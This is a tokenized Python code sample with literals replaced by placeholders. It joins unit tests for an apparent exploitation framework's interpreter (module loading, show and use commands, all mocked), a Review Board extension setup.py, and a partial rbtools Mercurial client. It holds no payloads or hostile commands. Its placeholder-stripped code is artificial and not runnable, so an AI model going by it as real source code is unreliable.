mock_exc_info ) : <EOL> with mock . patch . object ( self . interpreter . current_module , '<STR_LIT>' ) as mock_run : <EOL> mock_run . side_effect = RuntimeError <EOL> mock_format_exc . return_value = stacktrace = "<STR_LIT>" <EOL> mock_exc_info . return_value = info = "<STR_LIT:info>" <EOL> self . interpreter . command_run ( ) <EOL> mock_run . assert_called_once_with ( ) <EOL> mock_format_exc . assert_called_once_with ( info ) <EOL> mock_print_error . 
assert_called_once_with ( stacktrace ) <EOL> def test_command_back ( self ) : <EOL> self . assertIsNotNone ( self . interpreter . current_module ) <EOL> self . interpreter . command_back ( ) <EOL> self . assertIsNone ( self . interpreter . current_module ) <EOL> def test_custom_raw_prompt ( self ) : <EOL> self . prepare_prompt_env_variables ( raw_prompt = "<STR_LIT>" ) <EOL> self . interpreter . current_module = None <EOL> self . assertEqual ( "<STR_LIT>" , self . interpreter . prompt ) <EOL> def test_default_raw_prompt_no_env_variable ( self ) : <EOL> self . prepare_prompt_env_variables ( ) <EOL> self . interpreter . current_module = None <EOL> self . assertEqual ( self . raw_prompt_default , self . interpreter . prompt ) <EOL> def test_default_raw_prompt_wrong_env_variable_format ( self ) : <EOL> self . prepare_prompt_env_variables ( raw_prompt = "<STR_LIT>" ) <EOL> self . interpreter . current_module = None <EOL> self . assertEqual ( self . raw_prompt_default , self . interpreter . prompt ) <EOL> def test_custom_module_ ( self ) : <EOL> self . prepare_prompt_env_variables ( module_prompt = "<STR_LIT>" ) <EOL> module_name = "<STR_LIT>" <EOL> self . interpreter . current_module . _MagicMock__info__ = { '<STR_LIT:name>' : module_name } <EOL> self . assertEqual ( "<STR_LIT>" . format ( module_name ) , self . interpreter . prompt ) <EOL> def test_default_module_prompt_no_env_variable ( self ) : <EOL> self . prepare_prompt_env_variables ( ) <EOL> name = "<STR_LIT>" <EOL> self . interpreter . current_module . _MagicMock__info__ = { '<STR_LIT:name>' : name } <EOL> self . assertEqual ( self . module_prompt_default ( name ) , self . interpreter . prompt ) <EOL> def test_default_module_prompt_wrong_env_variable_format_1 ( self ) : <EOL> self . prepare_prompt_env_variables ( raw_prompt = "<STR_LIT>" ) <EOL> name = "<STR_LIT>" <EOL> self . interpreter . current_module . _MagicMock__info__ = { '<STR_LIT:name>' : name } <EOL> self . assertEqual ( self . 
module_prompt_default ( name ) , self . interpreter . prompt ) <EOL> def test_default_module_prompt_wrong_env_variable_format_2 ( self ) : <EOL> self . prepare_prompt_env_variables ( module_prompt = "<STR_LIT>" ) <EOL> name = "<STR_LIT>" <EOL> self . interpreter . current_module . _MagicMock__info__ = { '<STR_LIT:name>' : name } <EOL> self . assertEqual ( self . module_prompt_default ( name ) , self . interpreter . prompt ) <EOL> def test_module_prompt_module_has_no_metadata ( self ) : <EOL> del self . interpreter . current_module . _MagicMock__info__ <EOL> self . assertEqual ( self . module_prompt_default ( '<STR_LIT>' ) , self . interpreter . prompt ) <EOL> def test_module_prompt_module_has_no_name_key_in_metadata ( self ) : <EOL> self . interpreter . current_module . _MagicMock__info__ = { } <EOL> self . assertEqual ( self . module_prompt_default ( '<STR_LIT>' ) , self . interpreter . prompt ) <EOL> def test_suggested_commands_with_loaded_module ( self ) : <EOL> self . assertEqual ( <EOL> self . interpreter . suggested_commands ( ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> def test_suggested_commands_without_loaded_module ( self ) : <EOL> self . interpreter . current_module = None <EOL> self . assertEqual ( <EOL> self . interpreter . suggested_commands ( ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_command_use_01 ( self , mocked_import_module ) : <EOL> """<STR_LIT>""" <EOL> module_path = "<STR_LIT>" <EOL> self . interpreter . current_module = None <EOL> self . interpreter . modules = [ module_path , '<STR_LIT>' ] <EOL> exploit_class = mock . MagicMock ( name = "<STR_LIT>" ) <EOL> mocked_import_module . return_value = mocked_module = mock . MagicMock ( name = '<STR_LIT>' ) <EOL> mocked_module . Exploit = exploit_class <EOL> self . interpreter . command_use ( module_path ) <EOL> mocked_import_module . 
assert_called_once_with ( '<STR_LIT>' ) <EOL> self . assertEqual ( self . interpreter . current_module , exploit_class ( ) ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_command_use_02 ( self , mocked_import_module ) : <EOL> """<STR_LIT>""" <EOL> module_path = "<STR_LIT>" <EOL> self . interpreter . current_module = None <EOL> self . interpreter . modules = [ module_path , '<STR_LIT>' ] <EOL> exploit_class = mock . MagicMock ( name = "<STR_LIT>" ) <EOL> mocked_import_module . return_value = mocked_module = mock . MagicMock ( name = '<STR_LIT>' ) <EOL> mocked_module . Exploit = exploit_class <EOL> self . interpreter . command_use ( module_path ) <EOL> mocked_import_module . assert_called_once_with ( '<STR_LIT>' ) <EOL> self . assertEqual ( self . interpreter . current_module , exploit_class ( ) ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_command_use_unknown_module ( self , mocked_print_error , mocked_import_module ) : <EOL> """<STR_LIT>""" <EOL> self . interpreter . current_module = None <EOL> self . interpreter . modules = [ '<STR_LIT>' ] <EOL> module_path = "<STR_LIT>" <EOL> mocked_import_module . side_effect = ImportError <EOL> self . interpreter . command_use ( module_path ) <EOL> mocked_import_module . assert_called_once_with ( '<STR_LIT>' ) <EOL> mocked_print_error . assert_called_once_with ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . assertEqual ( self . interpreter . current_module , None ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_command_use_unknown_extension ( self , mocked_print_error , mocked_import_module ) : <EOL> """<STR_LIT>""" <EOL> module_path = "<STR_LIT>" <EOL> self . interpreter . current_module = None <EOL> self . interpreter . modules = [ module_path , '<STR_LIT>' ] <EOL> mocked_import_module . return_value = mocked_module = mock . MagicMock ( name = '<STR_LIT>' ) <EOL> del mocked_module . Exploit <EOL> self . interpreter . 
command_use ( module_path ) <EOL> mocked_import_module . assert_called_once_with ( '<STR_LIT>' ) <EOL> mocked_print_error . assert_called_once_with ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . assertEqual ( self . interpreter . current_module , None ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_command_show_info ( self , mock_print ) : <EOL> metadata = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' <EOL> } <EOL> description = "<STR_LIT>" <EOL> self . interpreter . current_module . __doc__ = description <EOL> self . interpreter . current_module . _MagicMock__info__ = metadata <EOL> self . interpreter . command_show ( '<STR_LIT:info>' ) <EOL> self . assertEqual ( <EOL> mock_print . mock_calls , <EOL> [ <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( ) ] <EOL> ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_command_show_info_module_with_no_metadata ( self , mock_print ) : <EOL> metadata = { } <EOL> description = "<STR_LIT>" <EOL> self . interpreter . current_module . __doc__ = description <EOL> self . interpreter . current_module . _MagicMock__info__ = metadata <EOL> self . interpreter . command_show ( '<STR_LIT:info>' ) <EOL> self . assertEqual ( <EOL> mock_print . mock_calls , <EOL> [ <EOL> mock . call ( ) ] <EOL> ) <EOL> @ mock . 
patch ( '<STR_LIT>' ) <EOL> def test_command_show_options ( self , mock_print ) : <EOL> exploit_attributes = { <EOL> '<STR_LIT:target>' : '<STR_LIT>' , <EOL> '<STR_LIT:port>' : '<STR_LIT>' , <EOL> '<STR_LIT:foo>' : '<STR_LIT>' , <EOL> '<STR_LIT:bar>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> self . interpreter . current_module . options = [ '<STR_LIT:target>' , '<STR_LIT:port>' , '<STR_LIT:foo>' , '<STR_LIT:bar>' , '<STR_LIT>' ] <EOL> self . interpreter . current_module . exploit_attributes . __getitem__ . side_effect = lambda key : exploit_attributes [ key ] <EOL> self . interpreter . current_module . foo = <NUM_LIT:1> <EOL> self . interpreter . current_module . bar = <NUM_LIT:2> <EOL> self . interpreter . current_module . baz = <NUM_LIT:3> <EOL> self . interpreter . current_module . target = '<STR_LIT:127.0.0.1>' <EOL> self . interpreter . current_module . port = <NUM_LIT> <EOL> self . interpreter . command_show ( '<STR_LIT>' ) <EOL> self . assertEqual ( <EOL> mock_print . mock_calls , <EOL> [ <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( ) , <EOL> mock . call ( ) , <EOL> ] <EOL> ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_command_show_options_when_there_is_no_module_opts ( self , mock_print ) : <EOL> exploit_attributes = { <EOL> '<STR_LIT:target>' : '<STR_LIT>' , <EOL> '<STR_LIT:port>' : '<STR_LIT>' , <EOL> } <EOL> self . interpreter . current_module . options = [ '<STR_LIT:target>' , '<STR_LIT:port>' ] <EOL> self . interpreter . current_module . exploit_attributes . __getitem__ . 
side_effect = lambda key : exploit_attributes [ key ] <EOL> self . interpreter . current_module . target = '<STR_LIT:127.0.0.1>' <EOL> self . interpreter . current_module . port = <NUM_LIT> <EOL> self . interpreter . command_show ( '<STR_LIT>' ) <EOL> self . assertEqual ( <EOL> mock_print . mock_calls , <EOL> [ <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( ) , <EOL> mock . call ( ) , <EOL> ] <EOL> ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_command_show_unknown_sub_command ( self , mock_print ) : <EOL> help_text = "<STR_LIT>" <EOL> self . interpreter . command_show ( '<STR_LIT>' ) <EOL> self . assertEqual ( <EOL> mock_print . mock_calls , <EOL> [ mock . call ( help_text ) ] <EOL> ) <EOL> def test_if_command_run_has_module_required_decorator ( self ) : <EOL> self . assertIsDecorated ( <EOL> self . interpreter . command_run , <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_if_command_set_has_module_required_decorator ( self ) : <EOL> self . assertIsDecorated ( <EOL> self . interpreter . command_set , <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_if_command_show_has_module_required_decorator ( self ) : <EOL> self . assertIsDecorated ( <EOL> self . interpreter . command_show , <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_if_command_check_has_module_required_decorator ( self ) : <EOL> self . assertIsDecorated ( <EOL> self . interpreter . command_check , <EOL> "<STR_LIT>" <EOL> ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_load_modules ( self , mock_getmembers , mock_import_module , mock_walk ) : <EOL> mock_walk . 
return_value = ( <EOL> ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] , [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> ( '<STR_LIT>' , [ ] , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> ( '<STR_LIT>' , [ ] , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> ) <EOL> mock_import_module . side_effect = [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ] <EOL> mock_getmembers . side_effect = [ <EOL> [ ] , <EOL> [ ] , <EOL> [ ( "<STR_LIT>" , TestExploit ) , ( '<STR_LIT>' , mock . MagicMock ) , ( '<STR_LIT>' , TestExploit ) ] , <EOL> [ ] , <EOL> [ ( "<STR_LIT>" , TestExploit ) , ( '<STR_LIT>' , mock . MagicMock ) ] <EOL> ] <EOL> self . interpreter . load_modules ( ) <EOL> mock_walk . assert_called_once_with ( self . interpreter . modules_directory ) <EOL> self . assertEqual ( <EOL> mock_import_module . mock_calls , <EOL> [ <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) <EOL> ] <EOL> ) <EOL> self . assertEqual ( <EOL> mock_getmembers . mock_calls , <EOL> [ <EOL> mock . call ( <NUM_LIT:1> , inspect . isclass ) , <EOL> mock . call ( <NUM_LIT:2> , inspect . isclass ) , <EOL> mock . call ( <NUM_LIT:3> , inspect . isclass ) , <EOL> mock . call ( <NUM_LIT:4> , inspect . isclass ) , <EOL> mock . call ( <NUM_LIT:5> , inspect . isclass ) , <EOL> ] <EOL> ) <EOL> self . assertEqual ( <EOL> self . interpreter . modules , <EOL> [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_load_modules_import_error ( self , mock_getmembers , mock_import_module , mock_walk ) : <EOL> mock_walk . 
return_value = ( <EOL> ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] , [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> ( '<STR_LIT>' , [ ] , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> ( '<STR_LIT>' , [ ] , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> ) <EOL> import_error = ImportError ( "<STR_LIT>" ) <EOL> mock_import_module . side_effect = [ <NUM_LIT:1> , <NUM_LIT:2> , import_error , <NUM_LIT:4> , <NUM_LIT:5> , import_error ] <EOL> mock_getmembers . side_effect = [ <EOL> [ ] , <EOL> [ ] , <EOL> [ ] , <EOL> [ ( "<STR_LIT>" , TestExploit ) , ( '<STR_LIT>' , mock . MagicMock ) ] <EOL> ] <EOL> self . interpreter . load_modules ( ) <EOL> mock_walk . assert_called_once_with ( self . interpreter . modules_directory ) <EOL> self . assertEqual ( <EOL> mock_import_module . mock_calls , <EOL> [ <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) <EOL> ] <EOL> ) <EOL> self . assertEqual ( <EOL> mock_getmembers . mock_calls , <EOL> [ <EOL> mock . call ( <NUM_LIT:1> , inspect . isclass ) , <EOL> mock . call ( <NUM_LIT:2> , inspect . isclass ) , <EOL> mock . call ( <NUM_LIT:4> , inspect . isclass ) , <EOL> mock . call ( <NUM_LIT:5> , inspect . isclass ) , <EOL> ] <EOL> ) <EOL> self . assertEqual ( <EOL> self . interpreter . modules , <EOL> [ <EOL> '<STR_LIT>' <EOL> ] <EOL> ) <EOL> self . assertEqual ( <EOL> self . interpreter . modules_with_errors , <EOL> { <EOL> "<STR_LIT>" : import_error , <EOL> '<STR_LIT>' : import_error , <EOL> } <EOL> ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_command_debug ( self , mocked_print_error , mocked_print_info , ) : <EOL> self . interpreter . 
modules_with_errors = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } <EOL> self . interpreter . command_debug ( ) <EOL> self . assertItemsEqual ( <EOL> mocked_print_info . mock_calls , <EOL> [ <EOL> mock . call ( "<STR_LIT>" ) , <EOL> mock . call ( "<STR_LIT>" ) , <EOL> mock . call ( "<STR_LIT>" ) , <EOL> ] <EOL> ) <EOL> self . assertItemsEqual ( <EOL> mocked_print_error . mock_calls , <EOL> [ <EOL> mock . call ( "<STR_LIT>" , '<STR_LIT:\n>' ) , <EOL> mock . call ( "<STR_LIT>" , '<STR_LIT:\n>' ) , <EOL> mock . call ( "<STR_LIT>" , '<STR_LIT:\n>' ) , <EOL> ] <EOL> ) <EOL> def test_command_exit ( self ) : <EOL> with self . assertRaises ( KeyboardInterrupt ) : <EOL> self . interpreter . command_exit ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> from setuptools import find_packages <EOL> from reviewboard . extensions . packaging import setup <EOL> from reviewbotext import get_package_version <EOL> PACKAGE = "<STR_LIT>" <EOL> setup ( <EOL> name = "<STR_LIT>" , <EOL> version = get_package_version ( ) , <EOL> license = "<STR_LIT>" , <EOL> description = "<STR_LIT>" , <EOL> author = "<STR_LIT>" , <EOL> maintainer = "<STR_LIT>" , <EOL> include_package_data = True , <EOL> packages = find_packages ( ) , <EOL> entry_points = { <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> } , <EOL> install_requires = [ <EOL> '<STR_LIT>' , <EOL> ] , <EOL> classifiers = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> ) </s>
<s> from __future__ import unicode_literals <EOL> import logging <EOL> import os <EOL> import re <EOL> import uuid <EOL> from six . moves . urllib . parse import urlsplit , urlunparse <EOL> from rbtools . clients import PatchResult , SCMClient , RepositoryInfo <EOL> from rbtools . clients . errors import ( InvalidRevisionSpecError , <EOL> TooManyRevisionsError ) <EOL> from rbtools . clients . svn import SVNClient <EOL> from rbtools . utils . checks import check_install <EOL> from rbtools . utils . filesystem import make_empty_files <EOL> from rbtools . utils . console import edit_text <EOL> from rbtools . utils . process import die , execute <EOL> class MercurialClient ( SCMClient ) : <EOL> """<STR_LIT>""" <EOL> name = '<STR_LIT>' <EOL> PRE_CREATION = '<STR_LIT>' <EOL> PRE_CREATION_DATE = '<STR_LIT>' <EOL> supports_diff_exclude_patterns = True <EOL> can_branch = True <EOL> can_bookmark = True <EOL> def __init__ ( self , ** kwargs ) : <EOL> super ( MercurialClient , self ) . __init__ ( ** kwargs ) <EOL> self . hgrc = { } <EOL> self . _type = '<STR_LIT>' <EOL> self . _remote_path = ( ) <EOL> self . _initted = False <EOL> self . _hg_env = { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> } <EOL> self . _hgext_path = os . path . normpath ( os . path . join ( <EOL> os . path . dirname ( __file__ ) , <EOL> '<STR_LIT:..>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> self . _remote_path_candidates = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT:default>' ] <EOL> @ property <EOL> def hidden_changesets_supported ( self ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> result = execute ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:0>' ] , <EOL> ignore_errors = True , <EOL> with_errors = False , <EOL> none_on_ignored_error = True ) <EOL> self . _hidden_changesets_supported = result is not None <EOL> return self . 
_hidden_changesets_supported <EOL> @ property <EOL> def hg_root ( self ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> root = execute ( [ '<STR_LIT>' , '<STR_LIT:root>' ] , env = self . _hg_env , <EOL> ignore_errors = True ) <EOL> if not root . startswith ( '<STR_LIT>' ) : <EOL> self . _hg_root = root . strip ( ) <EOL> else : <EOL> self . _hg_root = None <EOL> return self . _hg_root <EOL> def _init ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _initted or not self . hg_root : <EOL> return <EOL> self . _load_hgrc ( ) <EOL> svn_info = execute ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:info>' ] , ignore_errors = True ) <EOL> if ( not svn_info . startswith ( '<STR_LIT>' ) and <EOL> not svn_info . startswith ( '<STR_LIT>' ) and <EOL> not svn_info . lower ( ) . startswith ( '<STR_LIT>' ) ) : <EOL> self . _type = '<STR_LIT>' <EOL> self . _svn_info = svn_info <EOL> else : <EOL> self . _type = '<STR_LIT>' <EOL> for candidate in self . _remote_path_candidates : <EOL> rc_key = '<STR_LIT>' % candidate <EOL> if rc_key in self . hgrc : <EOL> self . _remote_path = ( candidate , self . hgrc [ rc_key ] ) <EOL> logging . debug ( '<STR_LIT>' % <EOL> self . _remote_path ) <EOL> break <EOL> self . _initted = True <EOL> def get_repository_info ( self ) : <EOL> """<STR_LIT>""" <EOL> if not check_install ( [ '<STR_LIT>' , '<STR_LIT>' ] ) : <EOL> logging . debug ( '<STR_LIT>' ) <EOL> return None <EOL> self . _init ( ) <EOL> if not self . hg_root : <EOL> return None <EOL> if self . _type == '<STR_LIT>' : <EOL> return self . _calculate_hgsubversion_repository_info ( self . _svn_info ) <EOL> else : <EOL> path = self . hg_root <EOL> base_path = '<STR_LIT:/>' <EOL> if self . _remote_path : <EOL> path = self . _remote_path [ <NUM_LIT:1> ] <EOL> base_path = '<STR_LIT>' <EOL> return RepositoryInfo ( path = path , base_path = base_path , <EOL> supports_parent_diffs = True ) <EOL> def parse_revision_spec ( self , revisions = [ ] ) : <EOL> """<STR_LIT>""" <EOL> self . 
_init ( ) <EOL> n_revisions = len ( revisions ) <EOL> if n_revisions == <NUM_LIT:1> : <EOL> revisions = re . split ( r'<STR_LIT>' , revisions [ <NUM_LIT:0> ] ) <EOL> n_revisions = len ( revisions ) <EOL> result = { } <EOL> if n_revisions == <NUM_LIT:0> : <EOL> if self . _type == '<STR_LIT>' : <EOL> result [ '<STR_LIT>' ] = self . _get_parent_for_hgsubversion ( ) <EOL> result [ '<STR_LIT>' ] = '<STR_LIT:.>' <EOL> else : <EOL> outgoing = self . _get_bottom_and_top_outgoing_revs_for_remote ( rev = '<STR_LIT:.>' ) <EOL> if outgoing [ <NUM_LIT:0> ] is None or outgoing [ <NUM_LIT:1> ] is None : <EOL> raise InvalidRevisionSpecError ( <EOL> '<STR_LIT>' ) <EOL> result [ '<STR_LIT>' ] = self . _identify_revision ( outgoing [ <NUM_LIT:0> ] ) <EOL> result [ '<STR_LIT>' ] = self . _identify_revision ( outgoing [ <NUM_LIT:1> ] ) <EOL> result [ '<STR_LIT>' ] = result [ '<STR_LIT>' ] <EOL> if self . has_pending_changes ( ) : <EOL> logging . warning ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if self . options . parent_branch : <EOL> result [ '<STR_LIT>' ] = result [ '<STR_LIT>' ] <EOL> result [ '<STR_LIT>' ] = self . _identify_revision ( <EOL> self . options . parent_branch ) <EOL> elif n_revisions == <NUM_LIT:1> : <EOL> result [ '<STR_LIT>' ] = self . _identify_revision ( revisions [ <NUM_LIT:0> ] ) <EOL> result [ '<STR_LIT>' ] = result [ '<STR_LIT>' ] <EOL> result [ '<STR_LIT>' ] = self . _execute ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , result [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' , '<STR_LIT>' ] ) . split ( ) [ <NUM_LIT:0> ] <EOL> if len ( result [ '<STR_LIT>' ] ) != <NUM_LIT:12> : <EOL> raise InvalidRevisionSpecError ( <EOL> "<STR_LIT>" <EOL> ) <EOL> elif n_revisions == <NUM_LIT:2> : <EOL> result [ '<STR_LIT>' ] = self . _identify_revision ( revisions [ <NUM_LIT:0> ] ) <EOL> result [ '<STR_LIT>' ] = self . 
_identify_revision ( revisions [ <NUM_LIT:1> ] ) <EOL> else : <EOL> raise TooManyRevisionsError <EOL> if '<STR_LIT>' not in result or '<STR_LIT>' not in result : <EOL> raise InvalidRevisionSpecError ( <EOL> '<STR_LIT>' % revisions ) <EOL> if self . _type == '<STR_LIT>' and '<STR_LIT>' not in result : <EOL> outgoing = self . _get_outgoing_changesets ( self . _get_remote_branch ( ) , <EOL> rev = result [ '<STR_LIT>' ] ) <EOL> logging . debug ( '<STR_LIT>' , <EOL> len ( outgoing ) ) <EOL> if not outgoing : <EOL> return result <EOL> parent_base = self . _execute ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , outgoing [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] , <EOL> '<STR_LIT>' , '<STR_LIT>' ] ) . split ( ) <EOL> if len ( parent_base ) == <NUM_LIT:0> : <EOL> raise Exception ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> result [ '<STR_LIT>' ] = parent_base [ <NUM_LIT:0> ] <EOL> logging . debug ( '<STR_LIT>' , <EOL> result [ '<STR_LIT>' ] ) <EOL> return result <EOL> def _identify_revision ( self , revision ) : <EOL> identify = self . _execute ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , str ( revision ) ] , <EOL> ignore_errors = True , none_on_ignored_error = True ) <EOL> if identify is None : <EOL> raise InvalidRevisionSpecError ( <EOL> '<STR_LIT>' % revision ) <EOL> else : <EOL> return identify . split ( ) [ <NUM_LIT:0> ] <EOL> def _calculate_hgsubversion_repository_info ( self , svn_info ) : <EOL> def _info ( r ) : <EOL> m = re . search ( r , svn_info , re . M ) <EOL> if m : <EOL> return urlsplit ( m . group ( <NUM_LIT:1> ) ) <EOL> else : <EOL> return None <EOL> self . _type = '<STR_LIT>' <EOL> root = _info ( r'<STR_LIT>' ) <EOL> url = _info ( r'<STR_LIT>' ) <EOL> if not ( root and url ) : <EOL> return None <EOL> scheme , netloc , path , _ , _ = root <EOL> root = urlunparse ( [ scheme , root . netloc . split ( "<STR_LIT:@>" ) [ - <NUM_LIT:1> ] , path , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> base_path = url . 
path [ len ( path ) : ] <EOL> return RepositoryInfo ( path = root , base_path = base_path , <EOL> supports_parent_diffs = True ) <EOL> def _load_hgrc ( self ) : <EOL> for line in execute ( [ '<STR_LIT>' , '<STR_LIT>' ] , split_lines = True ) : <EOL> line = line . split ( '<STR_LIT:=>' , <NUM_LIT:1> ) <EOL> if len ( line ) == <NUM_LIT:2> : <EOL> key , value = line <EOL> else : <EOL> key = line [ <NUM_LIT:0> ] <EOL> value = '<STR_LIT>' <EOL> self . hgrc [ key ] = value . strip ( ) <EOL> def get_raw_commit_message ( self , revisions ) : <EOL> """<STR_LIT>""" <EOL> rev1 = revisions [ '<STR_LIT>' ] <EOL> rev2 = revisions [ '<STR_LIT>' ] <EOL> delim = str ( uuid . uuid1 ( ) ) <EOL> descs = self . _execute ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' % ( rev1 , rev2 ) , <EOL> '<STR_LIT>' , '<STR_LIT>' % delim ] , <EOL> env = self . _hg_env , <EOL> results_unicode = False ) <EOL> descs = descs . split ( delim ) [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> return b'<STR_LIT>' . join ( [ desc . strip ( ) for desc in descs ] ) <EOL> def diff ( self , revisions , include_files = [ ] , exclude_patterns = [ ] , <EOL> extra_args = [ ] ) : <EOL> """<STR_LIT>""" <EOL> self . _init ( ) <EOL> diff_cmd = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> if self . _type == '<STR_LIT>' : <EOL> diff_cmd . append ( '<STR_LIT>' ) <EOL> diff_cmd += include_files <EOL> for pattern in exclude_patterns : <EOL> diff_cmd . append ( '<STR_LIT>' ) <EOL> diff_cmd . append ( pattern ) <EOL> diff = self . _execute ( <EOL> diff_cmd + [ '<STR_LIT>' , revisions [ '<STR_LIT>' ] , '<STR_LIT>' , revisions [ '<STR_LIT>' ] ] , <EOL> env = self . _hg_env , log_output_on_error = False , results_unicode = False ) <EOL> supports_empty_files = self . supports_empty_files ( ) <EOL> if supports_empty_files : <EOL> diff = self . 
